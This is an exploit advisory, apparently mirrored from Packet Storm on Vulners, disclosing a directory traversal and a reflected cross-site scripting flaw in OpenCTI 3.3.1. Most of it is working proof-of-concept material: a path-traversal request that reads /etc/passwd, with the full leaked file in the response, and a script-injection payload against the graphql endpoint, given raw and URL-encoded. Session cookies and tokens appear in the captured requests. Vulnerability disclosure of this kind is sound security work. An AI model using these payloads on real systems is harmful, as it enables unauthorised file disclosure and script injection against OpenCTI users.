Lucene search
K

OpenCTI 3.3.1 Cross Site Scripting / Directory Traversal

🗓️ 18 Jun 2020 00:00:00Reported by Raif Berkay DincelType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 603 Views

OpenCTI 3.3.1 - Directory Traversal / Cross Site Scripting vulnerabilities identifie

Code
`# Exploit Title: OpenCTI 3.3.1 - Directory Traversal  
# Date: 2020-03-05  
# Exploit Author: Raif Berkay Dincel  
# Vendor Homepage: www.opencti.io/  
# Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1]  
# Version: [3.3.1]  
# CVE-ID: N/A  
# Tested on: Linux Mint / Windows 10  
# Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD]  
  
# As a result of the research, two vulnerability were identified. (Directory Traversal & Cross Site Scripting [XSS])  
# Technical information is provided below step by step.  
  
# [1] - Directory Traversal Vulnerability  
  
# Vulnerable Parameter Type: GET  
# Vulnerable Parameter: TARGET/static/css/[Payload]  
  
# Proof of Concepts:  
https://TARGET/static/css//../../../../../../../../etc/passwd  
  
# HTTP Request:  
  
GET /static/css//../../../../../../../../etc/passwd HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c  
Upgrade-Insecure-Requests: 1  
  
# HTTP Response  
  
HTTP/1.1 200 OK  
X-DNS-Prefetch-Control: off  
X-Frame-Options: SAMEORIGIN  
Strict-Transport-Security: max-age=15552000; includeSubDomains  
X-Download-Options: noopen  
X-Content-Type-Options: nosniff  
X-XSS-Protection: 1; mode=block  
Content-Type: text/css; charset=utf-8  
ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o"  
Vary: Accept-Encoding  
Date: Sun, 03 May 2020 01:25:21 GMT  
Connection: close  
Content-Length: 1280  
  
root:x:0:0:root:/root:/bin/ash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
news:x:9:13:news:/usr/lib/news:/sbin/nologin  
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
man:x:13:15:man:/usr/man:/sbin/nologin  
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin  
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin  
ftp:x:21:21::/var/lib/ftp:/sbin/nologin  
sshd:x:22:22:sshd:/dev/null:/sbin/nologin  
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin  
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin  
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin  
games:x:35:35:games:/usr/games:/sbin/nologin  
postgres:x:70:70::/var/lib/postgresql:/bin/sh  
cyrus:x:85:12::/usr/cyrus:/sbin/nologin  
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin  
ntp:x:123:123:NTP:/var/empty:/sbin/nologin  
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin  
guest:x:405:100:guest:/dev/null:/sbin/nologin  
nobody:x:65534:65534:nobody:/:/sbin/nologin  
node:x:1000:1000:Linux User,,,:/home/node:/bin/sh  
  
  
# [2] - Cross Site Scripting (XSS) Vulnerability  
  
# Vulnerable Parameter Type: GET  
# Vulnerable Parameter: TARGET/graphql?[Payload]  
  
# Proof of Concepts:  
TARGET/graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt>  
  
https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E  
  
# HTTP Request:  
  
GET /graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt> HTTP/1.1  
Host: TARGET  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw  
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation